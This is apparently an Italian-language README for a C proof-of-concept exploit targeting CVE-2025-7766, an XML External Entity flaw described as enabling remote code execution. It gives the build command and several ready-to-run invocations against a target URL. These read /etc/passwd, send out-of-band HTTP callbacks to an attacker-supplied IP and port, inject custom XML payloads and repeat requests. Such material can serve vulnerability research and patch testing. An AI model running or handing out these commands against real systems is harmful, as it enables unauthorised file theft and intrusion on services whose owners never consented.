
Exploit PoC basato su C per CVE-2025-7766 che dimostra XXE-to-RCE tramite lettura di file e callback HTTP out-of-band. Supporta payload XML personalizzati e richieste ripetute.
PoC per sfruttare la vulnerabilità XML External Entity in CVE-2025-7766. Dimostra la lettura di file (/etc/passwd) e callback HTTP out-of-band.
Autore: Byte Reaper
CVE: CVE-2025-7766
Vulnerabilità: Esecuzione Remota di Codice tramite XML External Entity (XXE)
/etc/passwd dal target.gcc -o exploit exploit.c argparse.c -lcurl
# Read file payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT
# Out-of-band request payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r
# Custom payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'
# Repeat requests 5 times
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5
# Verbose output
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v
MIT